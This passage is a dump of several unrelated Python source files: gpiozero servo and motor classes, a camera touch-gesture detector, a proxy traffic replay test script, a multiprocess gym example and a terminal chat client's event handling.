ValueError('forward speed must be 0 or 1 with non-PWM Motors') self.enable_device.off() self.phase_device.off() self.enable_device.value = speed def backward(self, speed=1): """ Drive the motor backwards. :param float speed: The speed at which the motor should turn. Can be any value between 0 (stopped) and the default 1 (maximum speed). """ if isinstance(self.enable_device, DigitalOutputDevice): if speed not in (0, 1): raise ValueError('backward speed must be 0 or 1 with non-PWM Motors') self.enable_device.off() self.phase_device.on() self.enable_device.value = speed def reverse(self): """ Reverse the current direction of the motor. If the motor is currently idle this does nothing. Otherwise, the motor's direction will be reversed at the current speed. """ self.value = -self.value def stop(self): """ Stop the motor. """ self.enable_device.off() class Servo(SourceMixin, CompositeDevice): """ Extends :class:`CompositeDevice` and represents a PWM-controlled servo motor connected to a GPIO pin. Connect a power source (e.g. a battery pack or the 5V pin) to the power cable of the servo (this is typically colored red); connect the ground cable of the servo (typically colored black or brown) to the negative of your battery pack, or a GND pin; connect the final cable (typically colored white or orange) to the GPIO pin you wish to use for controlling the servo. 
The following code will make the servo move between its minimum, maximum, and mid-point positions with a pause between each:: from gpiozero import Servo from time import sleep servo = Servo(17) while True: servo.min() sleep(1) servo.mid() sleep(1) servo.max() sleep(1) :param int pin: The GPIO pin which the device is attached to. See :ref:`pin-numbering` for valid pin numbers. :param float initial_value: If ``0`` (the default), the device's mid-point will be set initially. Other values between -1 and +1 can be specified as an initial position. ``None`` means to start the servo un-controlled (see :attr:`value`). :param float min_pulse_width: The pulse width corresponding to the servo's minimum position. This defaults to 1ms. :param float max_pulse_width: The pulse width corresponding to the servo's maximum position. This defaults to 2ms. :param float frame_width: The length of time between servo control pulses measured in seconds. This defaults to 20ms which is a common value for servos. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, pin=None, initial_value=0.0, min_pulse_width=1/1000, max_pulse_width=2/1000, frame_width=20/1000, pin_factory=None): if min_pulse_width >= max_pulse_width: raise ValueError('min_pulse_width must be less than max_pulse_width') if max_pulse_width >= frame_width: raise ValueError('max_pulse_width must be less than frame_width') self._frame_width = frame_width self._min_dc = min_pulse_width / frame_width self._dc_range = (max_pulse_width - min_pulse_width) / frame_width self._min_value = -1 self._value_range = 2 super(Servo, self).__init__( pwm_device=PWMOutputDevice( pin, frequency=int(1 / frame_width), pin_factory=pin_factory ), pin_factory=pin_factory ) try: self.value = initial_value except: self.close() raise @property def frame_width(self): """ The time between control pulses, measured in seconds. """ return self._frame_width @property def min_pulse_width(self): """ The control pulse width corresponding to the servo's minimum position, measured in seconds. """ return self._min_dc * self.frame_width @property def max_pulse_width(self): """ The control pulse width corresponding to the servo's maximum position, measured in seconds. """ return (self._dc_range * self.frame_width) + self.min_pulse_width @property def pulse_width(self): """ Returns the current pulse width controlling the servo. """ if self.pwm_device.pin.frequency is None: return None else: return self.pwm_device.pin.state * self.frame_width def min(self): """ Set the servo to its minimum position. """ self.value = -1 def mid(self): """ Set the servo to its mid-point position. """ self.value = 0 def max(self): """ Set the servo to its maximum position. """ self.value = 1 def detach(self): """ Temporarily disable control of the servo. This is equivalent to setting :attr:`value` to ``None``. """ self.value = None def _get_value(self): if self.pwm_device.pin.frequency is None: return None else: return ( ((self.pwm_device.pin.state - self._min_dc) / self._dc_range) * self._value_range + self._min_value) @property def value(self): """ Represents the position of the servo as a value between -1 (the minimum position) and +1 (the maximum position). This can also be the special value ``None`` indicating that the servo is currently "uncontrolled", i.e. that no control signal is being sent. Typically this means the servo's position remains unchanged, but that it can be moved by hand. 
""" result = self._get_value() if result is None: return result else: # NOTE: This round() only exists to ensure we don't confuse people # by returning 2.220446049250313e-16 as the default initial value # instead of 0. The reason _get_value and _set_value are split # out is for descendents that require the un-rounded values for # accuracy return round(result, 14) @value.setter def value(self, value): if value is None: self.pwm_device.pin.frequency = None elif -1 <= value <= 1: self.pwm_device.pin.frequency = int(1 / self.frame_width) self.pwm_device.pin.state = ( self._min_dc + self._dc_range * ((value - self._min_value) / self._value_range) ) else: raise OutputDeviceBadValue( "Servo value must be between -1 and 1, or None") @property def is_active(self): return self.value is not None class AngularServo(Servo): """ Extends :class:`Servo` and represents a rotational PWM-controlled servo motor which can be set to particular angles (assuming valid minimum and maximum angles are provided to the constructor). Connect a power source (e.g. a battery pack or the 5V pin) to the power cable of the servo (this is typically colored red); connect the ground cable of the servo (typically colored black or brown) to the negative of your battery pack, or a GND pin; connect the final cable (typically colored white or orange) to the GPIO pin you wish to use for controlling the servo. Next, calibrate the angles that the servo can rotate to. In an interactive Python session, construct a :class:`Servo` instance. The servo should move to its mid-point by default. Set the servo to its minimum value, and measure the angle from the mid-point. Set the servo to its maximum value, and again measure the angle:: >>> from gpiozero import Servo >>> s = Servo(17) >>> s.min() # measure the angle >>> s.max() # measure the angle You should now be able to construct an :class:`AngularServo` instance with the correct bounds:: >>> from gpiozero import AngularServo >>> s = AngularServo(17, min_angle=-42, max_angle=44) >>> s.angle = 0.0 >>> s.angle 0.0 >>> s.angle = 15 >>> s.angle 15.0 .. note:: You can set *min_angle* greater than *max_angle* if you wish to reverse the sense of the angles (e.g. ``min_angle=45, max_angle=-45``). This can be useful with servos that rotate in the opposite direction to your expectations of minimum and maximum. :param int pin: The GPIO pin which the device is attached to. See :ref:`pin-numbering` for valid pin numbers. :param float initial_angle: Sets the servo's initial angle to the specified value. The default is 0. The value specified must be between *min_angle* and *max_angle* inclusive. ``None`` means to start the servo un-controlled (see :attr:`value`). :param float min_angle: Sets the minimum angle that the servo can rotate to. This defaults to -90, but should be set to whatever you measure from your servo during calibration. :param float max_angle: Sets the maximum angle that the servo can rotate to. This defaults to 90, but should be set to whatever you measure from your servo during calibration. :param float min_pulse_width: The pulse width corresponding to the servo's minimum position. This defaults to 1ms. :param float max_pulse_width: The pulse width corresponding to the servo's maximum position. This defaults to 2ms. :param float frame_width: The length of time between servo control pulses measured in seconds. This defaults to 20ms which is a common value for servos. 
:param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, pin=None, initial_angle=0.0, min_angle=-90, max_angle=90, min_pulse_width=1/1000, max_pulse_width=2/1000, frame_width=20/1000, pin_factory=None): self._min_angle = min_angle self._angular_range = max_angle - min_angle if initial_angle is None: initial_value = None elif ((min_angle <= initial_angle <= max_angle) or (max_angle <= initial_angle <= min_angle)): initial_value = 2 * ((initial_angle - min_angle) / self._angular_range) - 1 else: raise OutputDeviceBadValue( "AngularServo angle must be between %s and %s, or None" % (min_angle, max_angle)) super(AngularServo, self).__init__( pin, initial_value, min_pulse_width, max_pulse_width, frame_width, pin_factory=pin_factory ) @property def min_angle(self): """ The minimum angle that the servo will rotate to when :meth:`min` is called. """ return self._min_angle @property def max_angle(self): """ The maximum angle that the servo will rotate to when :meth:`max` is called. """ return self._min_angle + self._angular_range @property def angle(self): """ The position of the servo as an angle measured in degrees. This will only be accurate if *min_angle* and *max_angle* have been set appropriately in the constructor. This can also be the special value ``None`` indicating that the servo is currently "uncontrolled", i.e. that no control signal is being sent. Typically this means the servo's position remains unchanged, but that it can be moved by hand. """ result = self._get_value() if result is None: return None else: # NOTE: Why round(n, 12) here instead of 14? Angle ranges can be # much larger than -1..1 so we need a little more rounding to # smooth off the rough corners! return round( self._angular_range * ((result - self._min_value) / self._value_range) + self._min_angle, 12) @angle.setter def angle(self, angle): if angle is None: self.value = None elif ((self.min_angle <= angle <= self.max_angle) or (self.max_angle <= angle <= self.min_angle)): self.value = ( self._value_range * ((angle - self._min_angle) / self._angular_range) + self._min_value) else: raise OutputDeviceBadValue( "AngularServo angle must be between %s and %s, or None" % (self.min_angle, self.max_angle))
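# ----------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module above): a minimal
# demo of a few of the classes defined in this file. The pin numbers are
# arbitrary examples and real hardware (or a suitable pin factory) is assumed;
# the block only runs when the module is executed directly.
if __name__ == '__main__':
    from time import sleep

    led = PWMLED(17)
    led.pulse(fade_in_time=0.5, fade_out_time=0.5)  # fades in a background thread

    motor = Motor(forward=4, backward=14)
    motor.forward(speed=0.5)        # half speed forwards
    sleep(2)
    motor.reverse()                 # now half speed backwards

    servo = AngularServo(18, min_angle=-90, max_angle=90)
    servo.angle = 45                # move to +45 degrees
    sleep(2)
    servo.detach()                  # stop sending control pulses
# ----------------------------------------------------------------------------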
GD2.py
import math import threading from enum import Enum from Touch_Detector import Touch_Detector from datetime import datetime import cv2 class Gestures(Enum): NO_GESTURE=0 THREE_PRESS_HOLD=1 # back to previous board FOUR_PRESS_HOLD=2 # reset to 4*4 SWIPE_UP=3 SWIPE_DOWN=4 SWIPE_LEFT=5 SWIPE_RIGHT=6 PINCH=7 # change, VK_CHANGE, c PALM_PRESSING=8 class Single_Gestures(Enum): NO_GESTURE=0 PRESS_HOLD=1 SWIPE=2 class GD2: def __init__(self, min_wait_frame=6, min_prep_wait_frame=3, pinch_x_min_dist=2, pinch_y_min_dist=4, swipe_min_dist=50, palm_pressing_threshold=640 * 480 / 5, palm_pressing_missing_threshold=30, debug_mode=True): self.history = Ellipse_History() self.min_wait_frame = min_wait_frame self.min_prep_wait_frame = min_prep_wait_frame self.pinch_x_min_dist = pinch_x_min_dist self.pinch_y_min_dist = pinch_y_min_dist self.debug_mode = debug_mode self.swipe_min_dist = swipe_min_dist self.palm_pressing_threshold = palm_pressing_threshold self.palm_pressing_missing_threshold = palm_pressing_missing_threshold self.palm_pressing_status = {"is_triggered":False, "not_pressed_ct":0} self.gesture = None self._t_effector = threading.Thread(target=self.initGestureDetector) self._t_effector.daemon = True # "before the start`" self._t_effector.start() def print_single_gestures(self): printed = False for i,d in self.history.history.items(): printed = True print(i,": ",d["gesture"],end=" ") if printed: print() def add_ellipses(self,list_of_ellipses): self.history.add_many(list_of_ellipses) def detect_palm_pressing(self, thresholded_img, hist): for i,d in hist.items(): if d["is_triggered"]: return Gestures.NO_GESTURE white_pixels_ct = cv2.countNonZero(thresholded_img) is_pressing = white_pixels_ct > self.palm_pressing_threshold gesture = Gestures.NO_GESTURE if is_pressing: if not self.palm_pressing_status["is_triggered"]: gesture = Gestures.PALM_PRESSING self.palm_pressing_status["is_triggered"] = True else: self.palm_pressing_status["not_pressed_ct"]+=1 if self.palm_pressing_status["not_pressed_ct"]>self.palm_pressing_missing_threshold: self.palm_pressing_status["not_pressed_ct"]=0 self.palm_pressing_status["is_triggered"] = False return gesture def detect_gesture(self, thresholded_img): hist = self.history.history gesture = self.detect_palm_pressing(thresholded_img,hist) if gesture == gesture.NO_GESTURE and not self.palm_pressing_status["is_triggered"]: for i,d in hist.items(): if not d["is_triggered"]: if len(d["history"])>self.min_wait_frame: single_hist = d["history"] gesture, value = self.process_single_gesture(single_hist) hist[i]["gesture"] = gesture hist[i]["value"] = value hist[i]["is_in_detect_state"] = True hist[i]["is_in_prep_state"] = True elif len(d["history"])>self.min_prep_wait_frame: single_hist = d["history"] gesture, value = self.process_single_gesture(single_hist) hist[i]["gesture"] = gesture hist[i]["value"] = value hist[i]["is_in_prep_state"] = True gesture = self.process_gesture(hist) #self.print_single_gestures() return gesture def process_gesture(self,hist): final_gesture = Gestures.NO_GESTURE hold_ct = 0 hold_prep_ct = 0 holds = {} holds_prep = {} swipe_ct = 0 swipe_prep_ct = 0 swipes = {} swipes_prep = {} for i,d in hist.items(): if d["is_triggered"]: return Gestures.NO_GESTURE if not d["is_triggered"]: if d["gesture"] == Single_Gestures.PRESS_HOLD: hold_prep_ct+=1 holds_prep[i] = d["value"] if d["is_in_detect_state"]: hold_ct+=1 holds[i] = d["value"] elif d["gesture"] == Single_Gestures.SWIPE: swipe_prep_ct+=1 swipes_prep[i] = d["value"] if d["is_in_detect_state"]: swipe_ct+=1 
swipes[i] = d["value"] # if self.debug_mode: # if len(hist)>0: # print("Hold: ", hold_ct, hold_prep_ct, "Swipe: ", swipe_ct, swipe_prep_ct) if swipe_prep_ct==2 and swipe_ct>0: # Detect Pinch if self.debug_mode: print("Detect Pinch") v1, v2 = list(swipes_prep.values()) dex1, dey1 = v1 dex2, dey2 = v2 is_x_pinch = False is_y_pinch = False if abs(dex1)>self.pinch_x_min_dist and abs(dex2)>self.pinch_x_min_dist: if dex2*dex1<0: # different sign is_x_pinch=True if abs(dey1)>self.pinch_y_min_dist and abs(dey2)>self.pinch_y_min_dist: if dey2*dey1<0: # different sign is_y_pinch=True #TODO: Robustness improvement on distinguishing other similar gestures for i in swipes_prep: hist[i]["is_triggered"] = True if is_x_pinch or is_y_pinch: final_gesture = Gestures.PINCH elif swipe_ct == 1: if self.debug_mode: print("Detect 1 swip") itmp = list(swipes.keys())[0] vtmp = list(swipes.values())[0] dex, dey = vtmp hist[itmp]["is_triggered"] = True if abs(dex)<0.5*abs(dey) and abs(dey)>self.swipe_min_dist: # up or down # up & down reversed due to cam angle if dey<0: final_gesture = Gestures.SWIPE_DOWN else: final_gesture = Gestures.SWIPE_UP elif abs(dey)<0.5*abs(dex) and abs(dex)>self.swipe_min_dist: # left or right if dex<0: final_gesture = Gestures.SWIPE_LEFT else: final_gesture = Gestures.SWIPE_RIGHT elif hold_prep_ct==3 and hold_ct>0: if self.debug_mode: print("Detect 3 hold") for i in holds_prep: hist[i]["is_triggered"] = True final_gesture = Gestures.THREE_PRESS_HOLD elif hold_prep_ct==4 and hold_ct>0: if self.debug_mode: print("Detect 4 hold") for i in holds_prep: hist[i]["is_triggered"] = True final_gesture = Gestures.FOUR_PRESS_HOLD # else: # if self.debug_mode: # print("Hold: ",hold_ct,hold_prep_ct, "Swipe: ",swipe_ct,swipe_prep_ct) return final_gesture def process_single_gesture(self, history_ellipses): gesture = Single_Gestures.NO_GESTURE value = [] first = history_ellipses[0] last = history_ellipses[-1] xf,yf = first[0] xl,yl = last[0] dex = xl-xf #delta_end_x dey = yl-yf if abs(dex)+abs(dey) < 20: gesture = Single_Gestures.PRESS_HOLD else: gesture = Single_Gestures.SWIPE value = [dex,dey] return gesture,value def getGesture(self): return self.gesture def initGestureDetector(self): grayscale_threshold = 130 touch_detector = Touch_Detector(grayscale_threshold=grayscale_threshold, width_height_ratio_threshold=0.3, min_touch_area=500, max_touch_area=7000) def change_grayscale_threshold(x): touch_detector.grayscale_threshold = x def change_min_area_threshold(x): touch_detector.min_touch_area = x def change_max_area_threshold(x): touch_detector.max_touch_area = x # gesture_detector = Gesture_Detector() # camera_port = "out2.avi" camera_port = 1 camera = cv2.VideoCapture(camera_port) cv2.namedWindow('image') cv2.createTrackbar('GrayscaleMinValue', 'image', 0, 255, change_grayscale_threshold) cv2.setTrackbarPos('GrayscaleMinValue', 'image', grayscale_threshold) cv2.createTrackbar('Min Area', 'image', 10, 1000, change_min_area_threshold) cv2.setTrackbarPos('Min Area', 'image', 500) cv2.createTrackbar('Max Area', 'image', 10, 10000, change_max_area_threshold) cv2.setTrackbarPos('Max Area', 'image', 7000) while True: ok, frame = camera.read() if ok: gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) ellipses = touch_detector.get_touch_ellipses(gray_frame) self.add_ellipses(ellipses) self.gesture = self.detect_gesture(touch_detector.get_current_thresholded_image()) if self.gesture is not Gestures.NO_GESTURE: print(datetime.now(), self.gesture) rgb_frame = cv2.cvtColor(gray_frame, cv2.COLOR_GRAY2BGR) image = 
touch_detector.visualize(ellipses=ellipses, image=rgb_frame) cv2.imshow("image", image) cv2.moveWindow("image", 1, 1) cv2.waitKey(1) class Ellipse_History: def __init__(self): self.history = {} self.id = 0 self.not_detected_upper_bound = 3 def add_one(self, ellipse): id = self.get_ellipse_id(ellipse) if id in self.history: self.history[id]["history"].append(ellipse) self.history[id]["not_detected_ct"] = 0 else: self.history[id] = {"is_triggered":False, "is_in_prep_state":False, "is_in_detect_state":False, "not_detected_ct":0, "history":[ellipse], "gesture":Single_Gestures.NO_GESTURE, "value":[]} return id def add_many(self,list_of_ellipses): added_id = set() for ellipse in list_of_ellipses: added_id.add(self.add_one(ellipse)) outdated_keys = [] for i in self.history: if i not in added_id: self.history[i]["not_detected_ct"]+=1 if self.history[i]["not_detected_ct"]>self.not_detected_upper_bound: outdated_keys.append(i) for i in outdated_keys: del self.history[i] def get_ellipse_id(self,ellipse_in,max_dist = 70): """ Get ellipse id. If has existing ellipse in history that's close enough, return that id. If not, get a new id. :param ellipse_in: single ellipse :param max_dist: upper bound for two positions to be considered the same ellipse :return: ellipse id """ xi,yi = ellipse_in[0] min_d = math.inf min_i = self.id for i,d in self.history.items(): x,y = d["history"][-1][0] dist = abs(xi-x)+abs(yi-y) if dist < max_dist and dist < min_d: min_d = dist min_i = i if min_i == self.id: self.id+=1 return min_i def gesture_detection_loop(): print("in gesture detector2") grayscale_threshold = 130 touch_detector = Touch_Detector(grayscale_threshold=grayscale_threshold, width_height_ratio_threshold=0.3, min_touch_area=500, max_touch_area=7000) def change_grayscale_threshold(x): touch_detector.grayscale_threshold = x def change_min_area_threshold(x): touch_detector.min_touch_area = x def change_max_area_threshold(x): touch_detector.max_touch_area = x # gesture_detector = Gesture_Detector() # camera_port = "out2.avi" camera_port = 1 camera = cv2.VideoCapture(camera_port) cv2.namedWindow('image') cv2.createTrackbar('GrayscaleMinValue', 'image', 0, 255, change_grayscale_threshold) cv2.setTrackbarPos('GrayscaleMinValue', 'image', grayscale_threshold) cv2.createTrackbar('Min Area', 'image', 10, 1000, change_min_area_threshold) cv2.setTrackbarPos('Min Area', 'image', 500) cv2.createTrackbar('Max Area', 'image', 10, 10000, change_max_area_threshold) cv2.setTrackbarPos('Max Area', 'image', 7000) gd2 = GD2() while True: ok, frame = camera.read() if ok: gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) ellipses = touch_detector.get_touch_ellipses(gray_frame) gd2.add_ellipses(ellipses) gesture = gd2.detect_gesture(touch_detector.get_current_thresholded_image()) if gesture is not Gestures.NO_GESTURE: print(datetime.now(), gesture) rgb_frame = cv2.cvtColor(gray_frame, cv2.COLOR_GRAY2BGR) image = touch_detector.visualize(ellipses=ellipses, image=rgb_frame) cv2.imshow("image", image) cv2.moveWindow("image", 1, 1) cv2.waitKey(1)
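# ----------------------------------------------------------------------------
# Illustrative sketch (not part of the original module above): the touch
# tracking in Ellipse_History.get_ellipse_id() matches a new ellipse centre to
# the closest previously seen centre by Manhattan distance. A standalone toy
# version of that matching rule, with made-up coordinates:
def _demo_closest_track(point, tracks, max_dist=70):
    """Return the id of the nearest tracked point within max_dist, else None."""
    best_id, best_dist = None, max_dist
    for track_id, (tx, ty) in tracks.items():
        dist = abs(point[0] - tx) + abs(point[1] - ty)
        if dist < best_dist:
            best_id, best_dist = track_id, dist
    return best_id

# _demo_closest_track((105, 200), {0: (100, 198), 1: (400, 50)}) -> 0
# _demo_closest_track((300, 300), {0: (100, 198), 1: (400, 50)}) -> None (too far)
# ----------------------------------------------------------------------------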
RandomReplay.py
#!/bin/env python3 ''' ''' # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import socket import requests import os from threading import Thread import sys from multiprocessing import current_process import sessionvalidation.sessionvalidation as sv from collections import deque import collections import lib.result as result import extractHeader import mainProcess import json import gzip import NonSSL import SSLReplay import h2Replay import itertools import random bSTOP = False def session_replay(input, proxy, result_queue): global bSTOP ''' Replay all transactions in session This entire session will be replayed in one requests.Session (so one socket / TCP connection)''' # if timing_control: # time.sleep(float(session._timestamp)) # allow other threads to run while bSTOP == False: for session in iter(input.get, 'STOP'): # print(bSTOP) if session == 'STOP': print("Queue is empty") bSTOP = True break with requests.Session() as request_session: request_session.proxies = proxy for txn in session.getTransactionIter(): type = random.randint(1, 1000) try: if type % 3 == 0: NonSSL.txn_replay(session._filename, txn, proxy, result_queue, request_session) elif type % 3 == 1: SSLReplay.txn_replay(session._filename, txn, proxy, result_queue, request_session) elif type % 3 == 2: h2Replay.txn_replay(session._filename, txn, proxy, result_queue, request_session) except: e = sys.exc_info() print("ERROR in replaying: ", e, txn.getRequest().getHeaders()) bSTOP = True #print("Queue is empty") input.put('STOP') break def client_replay(input, proxy, result_queue, nThread): Threads = [] for i in range(nThread): t2 = Thread(target=SSLReplay.session_replay, args=[input, proxy, result_queue]) t = Thread(target=NonSSL.session_replay, args=[input, proxy, result_queue]) t1 = Thread(target=h2Replay.session_replay, args=[input, proxy, result_queue]) t2.start() t.start() t1.start() Threads.append(t) Threads.append(t2) Threads.append(t1) for t1 in Threads: t1.join()
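# ----------------------------------------------------------------------------
# Illustrative note (not part of the original module above): session_replay()
# picks one of the three replay protocols per transaction with
# random.randint(1, 1000) % 3. An equivalent, slightly simpler selection using
# random.choice over the three handlers imported at the top of this file:
#
#     replay_fn = random.choice(
#         [NonSSL.txn_replay, SSLReplay.txn_replay, h2Replay.txn_replay])
#     replay_fn(session._filename, txn, proxy, result_queue, request_session)
# ----------------------------------------------------------------------------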
multi_gym_example.py
#!/usr/bin/env python3 import gym import numpy as np import ffai from multiprocessing import Process, Pipe from ffai.ai.renderer import Renderer def worker(remote, parent_remote, env): parent_remote.close() # Get observations space (layer, height, width) obs_space = env.observation_space # Get action space act_space = env.action_space # Create random state for action selection seed = env.get_seed() rnd = np.random.RandomState(seed) # Play 10 games steps = 0 # Reset environment obs = env.reset() while True: command = remote.recv() if command == 'step': # Sample random action type action_types = env.available_action_types() action_type = rnd.choice(action_types) # Sample random position - if any available_positions = env.available_positions(action_type) pos = rnd.choice(available_positions) if len(available_positions) > 0 else None # Create action object action = { 'action-type': action_type, 'x': pos.x if pos is not None else None, 'y': pos.y if pos is not None else None } # Gym step function obs, reward, done, info = env.step(action) steps += 1 # Render # Currently crashes on mac python 3.7.4 # env.render(feature_layers=False) if done: obs = env.reset() remote.send((obs, reward, done, info)) elif command == 'reset': # Reset environment obs = env.reset() done = False elif command == 'close': # Close environment env.close() break if __name__ == "__main__": renderer = Renderer() nenvs = 8 envs = [gym.make("FFAI-3-v1") for _ in range(nenvs)] for i in range(len(envs)): envs[i].seed() remotes, work_remotes = zip(*[Pipe() for _ in range(nenvs)]) ps = [Process(target=worker, args=(work_remote, remote, env)) for (work_remote, remote, env) in zip(work_remotes, remotes, envs)] for p in ps: p.daemon = True # If the main process crashes, we should not cause things to hang p.start() for remote in work_remotes: remote.close() for i in range(10): print(i) for remote in remotes: remote.send('step') results = [remote.recv() for remote in remotes] for j in range(len(results)): obs, reward, done, info = results[j] # Currently crashes on mac python 3.7.4 # renderer.render(obs, j) for remote in remotes: remote.send('close') for p in ps: p.join()
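# Illustrative sketch (hypothetical, standalone; not part of the file above).
# worker() is a command loop on a Pipe: the parent sends 'step', 'reset' or
# 'close' and the child answers with results. Below is a gym-free reduction
# of the same parent/child protocol so the control flow can be run anywhere.
from multiprocessing import Process, Pipe

def counter_worker(remote, parent_remote):
    parent_remote.close()          # the child does not use the parent's end
    count = 0
    while True:
        cmd = remote.recv()
        if cmd == 'step':
            count += 1
            remote.send(count)
        elif cmd == 'close':
            remote.close()
            break

if __name__ == "__main__":
    remote, work_remote = Pipe()
    p = Process(target=counter_worker, args=(work_remote, remote))
    p.daemon = True
    p.start()
    work_remote.close()            # the parent does not use the child's end
    for _ in range(3):
        remote.send('step')
        print(remote.recv())       # 1, 2, 3
    remote.send('close')
    p.join()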
events.py
# Copyright 2022 iiPython # Modules import os import time import tempfile from copy import copy from typing import Tuple from threading import Thread from datetime import datetime from types import FunctionType from iipython import keys, readchar, clear, color, Socket from .config import config from .themes import ThemeManager from .plugins import PluginManager try: from src.vendor.termimg.image import TermImage except ImportError: TermImage = None # Initialization def scale_bytes(size: int) -> str: for unit in ["", "K", "M", "G"]: if abs(size) < 1024: return f"{size:3.1f}{unit}B" size /= 1024 return f"{size:.1f}TB" def truncate(text: str, length: int) -> str: oldlen, text = len(text), text[:length] if len(text) != oldlen: text += "..." return text # Context class EventContext(object): def __init__(self, data: dict, in_history: bool = False) -> None: self.raw = data self.type = data["type"] self.data = data["data"] self.server = data["server"] self.timestamp = data["ts"] self.in_history = in_history # Event Manager class EventManager(object): def __init__(self) -> None: self.sock, self.pluginmgr = None, None self.events, self.themes = {}, ThemeManager() # Shared data (for use by plugins) self.shared = {"input": "", "spacer": " " * os.get_terminal_size()[0], "history": [], "config": config} # Formatters self.data_formatters = { "m.msg": lambda d: (d.data["author"]["username"], self.pluginmgr.on_msg(d.data["content"])), "m.bin": self.format_bin, "u.join": lambda d: ("System", f"[blue]{d.data['username']} [green]has joined the server."), "u.leave": lambda d: ("System", f"[blue]{d.data['username']} [red]has left the server.") } self.time_formatters = { "12h": lambda ts: datetime.fromtimestamp(ts).strftime("%I:%M %p"), "24h": lambda ts: datetime.fromtimestamp(ts).strftime("%H:%M"), "utc12h": lambda ts: datetime.utcfromtimestamp(ts).strftime("%I:%M %p"), "utc24h": lambda ts: datetime.utcfromtimestamp(ts).strftime("%H:%M") } def format_bin(self, d: EventContext) -> tuple: def print_image(data: EventContext) -> None: file = tempfile.NamedTemporaryFile(delete = False, suffix = "." 
+ d.data["filename"].split(".")[-1]) file.write(bytes.fromhex(data.data["binary"])) d.data["content"] = str(TermImage.from_file(file.name)) d.type = "m.msg" self.print_event(d) try: os.remove(file.name) except Exception: pass if d.data["filename"].split(".")[-1] in ["png", "jpg", "jpeg", "ico"] and TermImage is not None and not d.in_history: self.hook_event("onimagerecv", print_image) self.sock.sendjson({"type": "d.file", "data": {"id": d.data["id"], "callback": "onimagerecv"}}) return ( d.data["author"]["username"], f"{truncate(d.data['filename'], 16)} ({scale_bytes(d.data['size'])})\nDownload with [yellow]/files down {d.data['id']}[/]" ) def send_loop(self) -> None: history = {"entries": [], "index": -1, "store": None} while True: render = f"{color(self.themes.data['prompt'])}{self.shared['input']}" if len(render) == len(self.shared["spacer"]): self.shared["input"] = self.shared["input"][:-1] if self.shared["input"].startswith("/"): hint_guess = None guesses = sorted([p for p in self.pluginmgr.plugins if p.startswith(self.shared["input"][1:].split(" ")[0])], key = len) if guesses: if " " not in self.shared["input"]: render += color(f"[lblack]{guesses[0][len(self.shared['input']) - 1:]}") elif self.shared["input"].count(" ") == 1: last = self.shared["input"].split(" ")[1] hint_guess = sorted([h for h in self.pluginmgr.plugins[guesses[0]]["hints"] if h.startswith(last)], key = len) if hint_guess: render += color(f"[lblack]{hint_guess[0][len(last):]}") if self.shared["input"].count(" ") > 1: guesses = None print(f"\r{self.shared['spacer']}\r{render}", end = "") # Keypress handler kp = readchar() if kp in ["\t", 9] and self.shared["input"].startswith("/"): # 9 = tab on windows if not guesses: continue elif hint_guess is not None: if hint_guess: self.shared["input"] = " ".join(self.shared["input"].split(" ")[:-1] + [hint_guess[0]]) else: self.shared["input"] = "/" + guesses[0] elif isinstance(kp, str): self.shared["input"] += kp history["index"] = -1 history["store"] = None elif kp == keys.ENTER and self.shared["input"]: history_entry = copy(self.shared["input"]) if self.shared["input"][0] == "/": data = self.shared["input"][1:].split(" ")[0] if data in self.pluginmgr.plugins.keys(): self.shared["input"] = self.pluginmgr.on_call(self.shared["input"]) if self.shared["input"] is not None: self.sock.sendjson({"type": "m.msg", "data": {"content": self.shared["input"]}}) history["entries"] = [history_entry] + history["entries"] self.shared["input"] = "" elif kp == keys.UP: if history["store"] is None: history["store"] = copy(self.shared["input"]) try: history["index"] += 1 self.shared["input"] = history["entries"][history["index"]] except IndexError: history["index"] -= 1 elif kp == keys.DOWN: history["index"] -= 1 if history["index"] < 0: if history["store"] is not None: self.shared["input"] = copy(history["store"]) history["store"], history["index"] = None, -1 continue self.shared["input"] = history["entries"][history["index"]] elif kp == keys.BACKSPACE and self.shared["input"]: self.shared["input"] = self.shared["input"][:-1] elif kp == keys.CTRL_C: os._exit(0) # We need to stop the receive process def loop_recv(self, conn: Socket) -> None: self.sock = conn Thread(target = self.send_loop).start() clear() self.pluginmgr = PluginManager(self) # Receive loop while True: for event in conn.recvjson(): event = EventContext(event) self.shared["server"] = event.server if event.type[0] == "e": self.print_event(event, ("System", "[red]" + event.data["error"])) continue elif event.type == "m.history": if 
config.data.get("show_history", True): for item in event.data["items"]: self.print_event(EventContext(item, in_history = True)) self.print_event(EventContext({ "type": "m.msg", "data": { "author": {"username": "System"}, "content": f"[lblue]Welcome to [yellow]{event.data['items'][-1]['server']['name']}[/].[/]" }, "ts": time.time(), "server": event.data["items"][-1]["server"] })) continue elif "callback" in event.data: cb = event.data["callback"] if cb in self.events: self.events[cb](event) del self.events[cb] continue self.print_event(event) def hook_event(self, event: str, callback: FunctionType) -> None: self.events[event] = callback def print_line(self, text: str) -> None: print(color(f"\r{self.shared['spacer']}\r{text}[bgreset][reset]") + "\n\r" + color(self.themes.data["prompt"]) + self.shared["input"], end = "") def print_event(self, data: EventContext, body_data: Tuple[str, str] = None) -> None: if data.type in self.data_formatters and body_data is None: body_data = self.data_formatters[data.type](data) dt = self.time_formatters.get(config.data.get("time_format", "12h"), self.time_formatters["12h"])(data.timestamp) prefix = f"[{self.themes.elems['time']}]{dt}[/] [{self.themes.elems['name']}]{body_data[0]}[/] " for i, line in enumerate(body_data[1].split("\n")): body = f"{prefix if not i else ' ' * len(color(prefix, dry = True))}[{self.themes.elems['sep']}]|[/] {color(line)}" self.print_line(body)
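# Illustrative sketch (hypothetical, standalone; not part of the file above).
# EventManager.print_event() renders an event by looking its type up in a
# dict of formatter callables (data_formatters) and a dict of timestamp
# formatters (time_formatters). The reduction below keeps only that
# dispatch-by-type idea.
from datetime import datetime

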